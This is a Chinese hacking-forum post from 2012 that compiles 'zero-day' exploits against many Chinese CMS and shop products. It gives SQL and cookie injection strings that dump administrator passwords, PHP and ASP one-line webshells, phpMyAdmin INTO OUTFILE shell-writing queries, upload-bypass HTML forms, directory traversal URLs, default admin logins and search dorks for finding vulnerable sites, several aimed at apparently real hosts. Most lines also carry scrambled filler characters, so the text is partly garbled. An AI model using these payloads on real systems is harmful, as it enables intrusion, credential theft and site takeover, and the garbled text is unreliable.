找回密码
 立即注册
查看: 4436|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
& N0 t! a5 L( X) W6 y+ }; [, i. z% y, o; g) d, G
直接上exploit:0 ], G( c: j9 O. x; B
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));4 g' j7 h9 @% u2 L6 N. i
test:http://www.tb11.net/system/xitong/shownews.asp?id=210" i( j, H6 V7 E: J' c# |) e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" d# \6 [# A9 _. x9 |5 W  `& d- bAsprain论坛 注册用户 上传图片就可拿到webshell, i3 N. B9 H( s7 C
- S- k6 o: B: k; Y$ V* v
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。, m" l' `, k4 j' m: F5 B" j
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
9 Y& c! {; G, x) F2.gif 为一小图片文件,一定要小,比如qq表情图片
" x7 ~' A' i* S- l: X3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
; F9 f3 J9 O1 [4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了& L1 R- O: i* u3 g
5.q.asp;.gif
- X; J# a- a" T+ Q7 fgoogle:Powered by Asprain
; x7 X" X& E, p5 U1 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 N. T' k% _3 `9 o  h) @

, |% G- H+ m  `; y8 ]# {& A5 F0 v7 {8 d+ ]ShopNum1全部系统存在上传漏洞。
8 ~" W' W( O3 E9 z, {/ ]" D1 K. c% y/ M5 a6 D0 }
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。& G! q, f+ c3 Z2 G3 N" k
按说明 提示登录后台。。2 b% X% D" Q$ c& w/ \* j5 B3 N( Q2 C
在后台功能页面->附件管理->附件列表
2 J+ {3 C7 L7 j+ j$ h7 T可以直接上传.aspx 后缀木马* J2 y/ D" t: [( a+ f, l
http://demo.shopnum1.com/upload/20110720083822500.aspx
- K6 ?& x9 p( |# |2 q1 D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ K  _3 y8 o2 W% |: G  u9 Y( W
6 y0 J+ t- h% m* R% K1 G2 Z
牛牛CMS中小企业网站管理系统 上传漏洞
# I% q; b+ P2 @/ E+ y
1 Q: A- p/ f7 {  N; y' x; [8 d牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。1 K- S. {6 u2 V8 F
后台:admin/login.asp
  p8 S$ |6 \! |) V9 Q  \ewebeditor 5.5 Nday; k, A  }/ v( y- O1 j
exp:& h" [, @# q$ L: w& N' `, m
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
; ]+ u/ l+ ~4 p4 A6 ~3 @<input?type=file?name=uploadfile?size=100><br><br>?* l; h# U4 z: J# a
<input?type=submit?value=upload>?
1 |- n5 G) u- R3 I' Z, ^* d" R</form>' }" T8 M9 T+ x+ A
ps:先上传小马.' v6 _- M" Y6 K9 V! X$ y: R
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
4 ]$ R& u6 _( d- |) ]# J; w6 R' j4 i# |2 k& h* u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ G; u, t7 A/ z! P+ i% x5 V5 i4 d! Z+ g* b
YothCMS 遍历目录漏洞8 [+ I" B! k: \8 u( N% `

8 K" d; \2 Q: P7 `8 O优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。1 B' M8 ?4 {- x1 ^; g
默认后台:admin/login.asp2 y& l! ?2 ~+ Z4 c* i
遍历目录:
  ?0 E1 X3 l1 ?+ R4 [( ~  @ewebeditor/manage/upload.asp?id=1&dir=../
6 i/ i/ r5 @7 V+ kdata:  Y8 _# ?6 I; ~& i, `7 H1 A5 {1 v
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
+ C; k6 b: q4 ~9 l5 T9 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) I$ |2 t% B4 y( E2 i
& O/ M3 ^, u: C  XNet112企业建站系统 1.0
; }5 m* Y1 P5 @, O( V* x# g; Y  O1 i2 u/ q' \7 t
源码简介:* W3 h, h7 q" E
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
! [/ v5 F% ^2 L' w- Z添加管理员:# T1 ]; G8 Y/ Z1 U* `
http://www.0855.tv/admin/admin.asp?action=add&level=2
% M3 v& P! [2 ^9 T其实加不加都不是很重要,后台文件都没怎么作验证。4 }! p8 P  r% Q) H% o# B0 Y& V% \, K& G
上传路径:7 W: B/ E- J7 Q; x, n) t" H" i
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
* ^: s4 k- R! G7 g) P; jhttp://www.0855.tv/inc/Upfile.asp?Stype=2
9 T" K* j; ]. l& s1 v怎么利用自己研究。
3 b' E) p7 Z7 h1 ~遍历目录:. [6 R( y% w7 P5 T% L
http://www.0855.tv/admin/upfile.asp?path=../..
6 D. l& l4 Z. N' F0 `+ ~如:
! z3 ~& F8 i+ }http://www.0855.tv/admin/upfile.asp?path=../admin  ?$ N' m  P6 e" P0 ?
http://www.0855.tv/admin/upfile.asp?path=../data* A6 L7 J- K. h  @3 r5 }. Q, W5 u* s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 W# t5 h) F0 o( s

; `" \/ e5 z7 ?1 |% ^  A易和阳光购物商城通杀 上传漏洞
) C* ~, T* ]3 M" t) |& d
6 \$ c& U' o: {, n. u( q7 A前提要求是IIS6.0+asp坏境。- I3 S& K7 e6 V+ x
漏洞文件Iheeo_upfile.asp 7 T$ m; \* Z( {* P+ J* M
过滤不严.直接可以iis6.0上传
$ C, h7 h  G" E/ X* D把ASP木马改成0855.asp;1.gif* {# s9 B$ C2 [3 V
直接放到明小子上传* B  W# j( H" p' }" F. b
Google搜索:inurl:product.asp?Iheeoid=% I5 ?9 X* \0 z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 y3 ^: g9 o5 K
# f' T/ j8 E, C  |! i% i& ?0 c3 zphpmyadmin后台4种拿shell方法
9 G: v; M8 }$ D. |3 _6 K" f1 g( `2 _7 J4 A! S  V
方法一:3 @0 ?( Y0 j& u. q  |; H
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );7 t# ]" _& _7 A3 W0 L# `% x# `# O
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
% q( Z. c* p& [! _9 vSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
: a6 F3 X0 B6 A( E! c) u----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php, ]$ u4 P" A2 Y' G* Z7 i3 G
一句话连接密码:xiaoma; ~! G3 x$ i& X7 t' z
方法二:4 |, Z8 X4 S! U4 R
Create TABLE xiaoma (xiaoma1 text NOT NULL);
! E3 j( k6 I* t' A$ l2 Z6 vInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
5 ]: N4 _- X' P  g" }6 \+ a/ [select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
3 y& V$ H% \* Z4 A& L; `* oDrop TABLE IF EXISTS xiaoma;
) y) w% p- o! U# g1 K! i% z方法三:3 s) @, U/ x8 l8 I6 I' P
读取文件内容:    select load_file('E:/xamp/www/s.php');
) [) J( U8 `: p" Q. p1 @写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; k5 Q& l3 g- g5 Scmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 L( J- Q. O4 l方法四:% `) G7 I4 V% M' b4 r3 O, k
select load_file('E:/xamp/www/xiaoma.php');
- m- l! K9 r1 c- W. e% \# }- L) O6 vselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'7 O* [% X. u/ o, U
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir* T0 y6 W$ Q5 K' y# o, L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# m, a3 d0 O# y1 {
' X. R4 {: O+ Y8 Z传信网络独立开发网站源码0day漏洞
  J0 ~5 C1 o) P+ m  Q/ K. X! t' E
) Y) X% G  r0 o* _  C后台system/login.asp9 ~  g! p5 }3 f+ k
进了后台有个ewebeditor
6 R% F* a1 E6 A* e+ j: ]Google 搜索inurl:product1.asp?tyc=1 M, p( f. u6 s
编辑器漏洞默认后台ubbcode/admin_login.asp
3 `+ |9 s! n: Y# W& W! L8 o数据库ubbcode/db/ewebeditor.mdb/ N* C# F) s. W5 _# m* b
默认账号密码yzm 111111
$ _& t2 m, x% Z' V" I3 k: c+ a  A
* H6 [% P5 c" K2 b; d, G, e拿webshell方法
9 h; h& p4 P3 D# X+ W6 W' }登陆后台点击“样式管理”-选择新增样式 5 r( b% R2 D1 m0 F- n
样式名称:scriptkiddies 随便写 0 O0 F& w8 [" m% i: ^
路径模式:选择绝对路径
: q8 U6 V% Z) j) j$ `: U: D  N图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
9 j! S) G3 Z: ^5 m% i/ r图片类型比如就是我们要上传的ASP木马格式
7 w  x$ ?6 ^0 J5 Y# e( H# F9 v上传路径:/
! f& q7 b) D; h$ Q6 b. n图片限制:写上1000 免的上不了我们的asp木马9 f2 F" {2 y- y5 g9 v6 |
上传内容不要写4 Z; D8 L0 u5 ^$ {1 `- B  P: [) S
可以提交了 ( \) `7 a$ A2 `
样式增加成功!
+ J" A' L( m* L$ [返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
7 U% T5 T3 {! T1 f+ V+ w9 k按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
7 v3 z- ?2 |3 v/ j/ R0 M, N# K网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies; G  o: x0 b* G' |) V
上ASP木马 回车 等到路径
" D# g9 H5 Q& b! x$ `/ K# y+ E
% {' \  j7 n: L1 P. I后台:system/login.asp
; B+ b/ g( V" k- D6 t1 R5 Z* BExp:
# Y3 J, a& m( `+ ]; v$ Iand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 s4 Y  E+ G. Z
测试:' L9 \. h3 \/ N# l
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 D  j2 ~6 {% g5 X5 m: t3 c8 Ohttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master) d1 ]' m; S5 _: j. r; Y, l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 q% X, u% A/ V. q$ x* j7 H
8 V% I, c* T( _- q; L  `
foosun 0day 最新注入漏洞
: u! ~* I# s7 M  d: V  I' ~6 [- N9 ^! U6 m) r; Y
漏洞文件:www.xxx.com/user/SetNextOptions.asp- b# H6 J& z9 ~3 J1 a. _
利用简单的方法:* v! E1 N' _# P  D8 @! u
暴管理员帐号:+ U9 X" n$ G: @
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin0 X$ g" W; ~1 l& \" `  N
暴管理员密码:. R  Y! }  p0 O6 y- l$ w" D
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,( k4 ?0 f* |+ r3 h$ i6 z' L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ {8 ]5 [8 R/ Y. \# c
. M. _1 q: H8 i' Z- m* Z9 n' h0 y
网站程序的版权未知!
; J* M3 Z7 s  W, U
$ d+ e3 `! G& t6 A9 Z4 {% m默认网站数据库:$ F( S! R5 W! g
www.i0day.com/data/nxnews.mdb* I- F& I4 X1 y
ewebeditor 在线编辑器:
7 t+ `, B# X3 p$ e8 G编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
8 r$ _& a0 o$ M$ {  U登录地址:ewebeditor/admin_login.asp
9 ^. Z& A( Q" Y: ~) d( f0 f' z默认密码:admin  admin
. h3 \( e8 [* p. u6 Q3 O5 f( g1 y3 a登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data4 Q# A0 m% m3 @3 u  A& b3 e% j

2 T# u3 M: d9 Y9 m8 Q2 o0 fSql注入漏洞:
2 I  L  C$ \# xhttp://www.i0day.com/detail.asp?id=12" p- h/ W9 W' k9 |  ~; `3 v
exp:
: C2 G8 L4 v& w. h' d& x# vunion select 1,admin,password,4,5,6,7,8 from admin* s+ y+ ]4 u! i8 I; {
爆出明文帐号/密码
( ^9 W2 [" }( X. E" _( k2 E  U+ Z, h6 N) I
% }% d5 X; {$ v# [. o6 L+ ?: Y上传漏洞:
4 Z3 r' H- ?2 U' M" C. M2 ]后台+upfile.asp9 z0 B5 q' p; m
如:# h! P& F$ }; ~1 K$ h) [" X, X* }
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。3 T* b8 @# a# V1 Q4 Q5 X( l3 W' O
shell的地址:网址+后台+成功上传的马( n6 u: {6 t( x
google:inurl:news.asp?lanmuName=* b' L0 A& i# H) F# u6 |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 }, Q, N: x" A3 Y

/ X; o5 I; T, N) Ldedecms最新0day利用不进后台直接拿WEBSHELL2 m, p5 I) g- D  R) K+ p% T
4 n" @8 Z' k! V4 M' I0 ?# ?! e( q8 S/ I
拿webshell的方法如下:
" i; V  Y1 l4 ?0 V  u; c1 q8 x网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.! l7 X1 Q+ _* r- ~- \: k5 n+ q( c5 R
前题条件,必须准备好自己的dede数据库,然后插入数据:8 x. o8 R" j' |" o+ |7 C9 B
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); : b' C1 ?* p9 q

. j7 `6 [% J+ X9 L' |再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。+ a6 |& P) T2 B
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
  _# ]6 P5 C8 X% a$ P<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />% J$ p1 H- |( r( u( [( l
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: N& v' i0 k! z: v' `& U<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) M" p8 s( W. p" X
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) C& U- S8 p5 F8 F2 I' p( t# Q# ?9 o
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />3 U$ V" }3 Y) N# N
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />8 \9 Q4 q* v: O" v6 d0 t( s! \
<input type="text" value="true" name="nocache" style="width:400">
) G$ ]1 I& |, Z) x2 G% \<input type="submit" value="提交" name="QuickSearchBtn"><br />% W9 {8 J9 \2 G( c
</form>0 z4 J& J* ~  u: I" \
<script>
# F% x; r5 y% ~function addaction()
6 x; M2 ^3 P7 F  W' P- E9 \- \{3 y5 Y) [  [# I; _" p1 ^' S; i
document.QuickSearch.action=document.QuickSearch.doaction.value;3 K# X+ i3 W, f$ ~% C
}
/ q0 w8 ?6 Q# ^4 G9 ^</script>
% V  J4 i; Z: M8 H2 l  X-----------------------------------------------------------------------------------------------------------------------------------------------
3 ~' d- j3 {) e/ h& U1 k
" j: W* e/ @5 f- {dedecms织梦暴最新严重0day漏洞
) ]- k/ E0 C1 P( x9 ?- a) \4 Qbug被利用步骤如下:
% n+ r! @: r7 a5 T, f2 p4 Mhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 \+ E& \: [! y( I: W! P' a把上面{}上的字母改为当前的验证码,即可直接进入网站后台。& E' V# @$ A; x" |: c
-------------------------------------------------------------------------------------------------------------------------------------------# g! b/ R' u5 p& z

+ k" k! V! z: h多多淘宝客程序上传漏洞
% f9 P- D7 m& H) c漏洞页面:
# N: t3 _" o4 u8 r' D5 wadmin\upload_pic.php
  p5 {: J8 I$ ?, c3 Z' z' A$ e1 q" C传送门:  i' z5 B' r: H" W, d, i! K
http://www.www.com/admin/upload_pic.php?uploadtext=slide1( S" o) B) ^; D. U1 N4 u3 B
PS:copy张图片马 直接  xxx.php 上传抓包地址!
, N# _! z# A1 w( o+ w9 c------------------------------------------------------------------------------------------------------------------------------------------------------+ T( @- Q3 n% t( K* b. m! b0 W

& ?* x& Z3 U/ f! W无忧公司系统ASP专业版后台上传漏洞# x; g$ I& \* ]8 G$ Z2 h6 Y
漏洞文件 后台上传6 c( x9 D: R- G" m1 g2 D1 `
admin/uploadPic.asp: o. q  P% j+ o- f. e- [# Z
漏洞利用 这个漏洞好像是雷池的$ N0 B+ x7 n" S) |+ Q. D
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
/ K$ t/ w. q0 `4 p6 X6 Y/ G+ U  j0 g等到的webshell路径:
- w$ G: G. n, u2 n6 x8 Y8 }- k- a/UploadFiles/scriptkiddies.asp;_2.gif/ a$ a$ i7 J3 x: Y" l) X; t
---------------------------------------------------------------------------------------------------------------------------------------------------& ?* k) h4 }( f5 n; y: S

, |$ E/ H' F6 _0 J7 ]3 y: i1 w住哪酒店分销联盟系统2010
+ W" i, _5 j2 S; HSearch:
% t6 p8 u% M' A7 e+ Finurl:index.php?m=hotelinfo
% S* H0 n: M% P9 v, ~# J* Dhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin- d" y( h7 W" b0 \% b
默认后台:index.php?m=admin/login
$ s* C- ]: L7 S, I. H. {' I--------------------------------------------------------------------------------------------------------------------------------------------------9 ^4 l* K5 Z0 y' O6 L& F  q! k( K

0 X6 O1 z% G* Q! B) C3 k/ d- q8 ^- ^inurl:info_Print.asp?ArticleID=
6 ^, V! x1 p6 X* w后台 ad_login.asp. P* W4 _& i! P* v& R8 A
爆管理员密码:5 Y5 Q+ w/ T9 y
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin2 T- J3 J5 s' ?. u4 G0 Z
------------------------------------------------------------------------------------------------------------------------------------------------------------1 i" z+ S4 U% |0 e  c$ `4 m

$ P4 U( T- u6 x, s& q搜索框漏洞!
' H+ `3 @% R+ F; ~$ H/ \) w%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='$ G& S! Q; t4 d6 K2 Y
--------------------------------------------------------------------------------------------------------------------------------------------------------
( d+ y! k* e4 u. u+ ]2 i6 H! Q1 A5 ]- G3 U$ D6 Z+ C8 ?9 l3 _
关键字:
) N3 m$ f7 n( x+ u& Y) Sinurl:/reg_TemletSel.asp?step=2  }' f- _3 r3 s$ W3 H4 r
或者- M1 A( ^* X3 ?$ ?
电子商务自助建站--您理想的助手3 i, E4 j$ w7 L# s
-------------------------------------------------------------------------------------------------------------------------------------------------
4 W0 h* @6 K. C% E$ y2 c) `2 P6 k; D+ q. T2 S+ i' [
iGiveTest 2.1.0注入漏洞7 N+ V2 q) K  M4 L  {0 \
Version: <= 2.1.0; k! Z- \- }) P/ M+ {
# Homepage: http://iGiveTest.com/
2 \6 L& c: T7 V1 z% X& j谷歌关键字: “Powered by iGiveTest”4 R- T% ?. [6 Q% V. V$ O
随便注册一个帐号。然后暴管理员帐号和密码$ V& Q! h2 o  d! S# Z  N
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
0 K( M! ]0 f7 n------------------------------------------------------------------------------------------------------------------------------------------------
4 F4 s4 z  j& I( {9 A, j' ?& q' K, b: U$ E7 q5 `
CKXP网上书店注入漏洞
. J+ U( }# o6 O. Z工具加表:shop_admin 加字段:admin
$ P* b* T* ]3 _1 a* G# }3 G' X后台:admin/login.asp * [0 q* T) u: T" t0 Y3 @
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
1 Z- h5 I8 S, K' H, k. a' }& finurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息) b& g# H) a% ^1 f0 p8 h: Z- a! u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; g3 s+ x- V% d+ s4 J& D' y5 v6 F' c. N. w3 M, J9 h/ f5 d: V
段富超个人网站系统留言本写马漏洞6 K; X/ ~6 V  ]- A3 X
源码下载:http://www.mycodes.net/24/2149.htm. Z3 \. B2 v$ A$ I" X6 u! w/ Y
addgbook.asp 提交一句话。1 b0 \% @2 n* i: N+ i: q8 q
连接: http://www.xxxx.tv/date/date3f.asp4 U$ v; ~0 r/ h1 o" h, H
google:为防批量,特略!
4 W$ V) q: P2 y3 C8 H' f' C; ^8 G' N-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" V7 A1 l9 \- k9 v" i; ~3 J1 c# O4 T9 U  n( H2 X, Z
智有道专业旅游系统v1.0 注入及列目录漏洞+ @9 s8 w/ z, o4 c2 W, Z
默认后台路径:/admin/login.asp
; h6 ^3 k, ~! c5 z. `9 U默认管理员:admin* p* n7 l+ d7 t
默认密码:123456
* \$ {& j2 @8 f* ~& v& uSQL EXP Tset:
7 P9 I: @: I$ K! Z& F# c* ~http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin  f4 L( g, x( Z; j2 l. e6 o7 D
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( M! P! d* J2 r  e  x( z7 Z$ [4 P% \0 W" P
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
+ L0 N% v+ y3 s$ U" X# A0 SEXP:
0 y! q& h1 M% ]9 J' d% ]+ ^6 b<title>eWebeditoR3.8 for php任意文件上EXP</title>
5 |: |( @% Y5 A9 G/ _3 g9 X<form action="" method=post enctype="multip+ \' N% a% {8 Y
art/form-data"> " I7 F* C  p: W, O9 e
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
& O  j0 v* b1 a' Y. v: aURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ) S+ ?4 r! x" L. |. M
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">   e4 l1 X. X5 D% f/ f
file:<input type=file name="uploadfile"><br> * K, ~% ^  q8 w6 Y* r
<input type=button value=submit onclick=fsubmit()>
9 Y# B% [* D7 T8 @9 S</form><br> # e9 ^/ U" X( D  w
<script> , z/ j% Q6 G* c1 X4 w! U
function fsubmit(){ + |6 a! |! h; J. G: I, N' j3 d
form = document.forms[0];
$ ^8 n5 W+ f1 B! J* X8 bform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; v; I! `0 N4 W% D+ F
alert(form.action); 6 [& Y/ I7 U) z
form.submit(); " Q2 C  z' p, `% ?* b  G( |
}
, ^( K7 e, @2 B) h. }5 u3 r' G& b) R0 Y1 E</script>
* W" C6 v7 w; f" m; M/ D注意修改里面ewebeditor的名称还有路径。
- z5 j! V0 ?4 k; p- v" I+ D! s---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& U2 ^$ U0 D7 N# y$ O& D; e) o' w
提交’时提示ip被记录 防注入系统的利用# D* S) J9 ?1 a+ c5 R; B( Y
网址:http://www.xxx.com/newslist.asp?id=122) P3 ~) i! i: R' T1 V9 V% w
提示“你的操作已被记录!”等信息。
& Q9 ~( a0 R4 J& E# f# ^  J利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。% r7 e& c3 E, T. T% t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# p6 p7 l  j% Q: W
( s% k7 u5 C* h! R3 J9 `4 V
西部商务网站管理系统 批量拿shell-0day
* E% u( u. q0 ^+ J5 S这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
& T% x5 d( u5 z, j' l7 I0 J3 T1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛$ @' Y/ M. W( v5 d8 A! Q
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合6 S8 i, h4 g1 C4 I' X3 f$ w1 t
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂. R/ o# K' u- Z' {% p
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# B0 l) J! J8 M' d4 N  T
# b- m+ N+ d2 ?' Q9 I9 t9 P' \
JspRun!6.0 论坛管理后台注入漏洞9 i" R: H' l" _: }9 T& i8 w* E

1 Q; c5 k& O- sSEBUG-ID:20787 发布时间:2011-04-30 影响版本:2 N* U! b6 c& c" b, z% @( a4 w, S0 n
JspRun!6.0 & t/ p' p/ T4 Q' [
漏洞描述:  l" X9 D( @0 u9 S5 L
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。/ g/ K1 T% ^: d1 j; B3 G) `
在处理后台提交的文件中ForumManageAction.java第1940行
2 i: A. H0 H* @! q/ i2 `8 iString export = request.getParameter("export");//直接获取,没有安全过滤
" K- Y8 w0 D& S  i7 Wif(export!=null){) m0 `2 i" ?2 R4 [$ X
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...( M/ z# [* s6 G3 ?& F' D* G
if(styles==null||styles.size()==0){
; h, u0 ~; [4 ]/ d<*参考7 C; x% f' ^% P) }6 e
nuanfan@gmail.com
3 w- ]: A: e( K/ ~6 i*> SEBUG安全建议:
4 v( r0 Z9 k- b$ g# [4 M0 vwww.jsprun.net$ K& v! O$ Q$ q* ]
(1)安全过滤变量export
. T7 a# _' O4 A! u(2)在查询语句中使用占位符
% \" A/ `. d, y( [8 v------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% S# C+ Q, L! h  K" g1 E+ h# N' j$ z# U3 w
乌邦图企业网站系统 cookies 注入
; ^: Z6 @8 X) F; V. @% g& Z
" h% Y+ O$ s$ X程序完整登陆后台:/admin/login.asp
& l8 n; r; F% n3 x% k; ]! j默认登陆帐号:admin 密码:admin888
4 c! t+ W+ T. z6 g语句:(前面加个空格)
- X- C; E, x; c- Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin" r- R$ y$ V% t( N; f3 p/ Y5 n
或者是16个字段:4 k4 V1 h: y/ A# n/ A# t5 d+ L. B
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin# c" }  Y1 J( R# T0 Q/ F
爆不出来自己猜字段。
3 H8 {' D( J' T* u注入点:http://www.untnt.com/shownews.asp?=88
" ^5 @* ~5 r# i) G" H+ K7 H+ tgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp0 }; |7 e5 {6 V0 h
关键字:1 N& u! M- A2 `7 U! O# P1 T; {! `
inurl:shownews?asp.id=0 u; q! o( x  o" M% m
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------  o( I: A0 G- \9 @' |* R% o  O
9 B3 `  f+ M5 M" o% _
CKXP网上书店注入漏洞) q7 w+ \. D$ N( j( P5 ~& P  E
' x3 b. b) v6 d
工具加表:shop_admin 加字段:admin
) F9 y1 H9 \8 l6 x/ Q( x- z7 y后台:admin/login.asp
7 r) Z  w7 k6 u& \' @登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
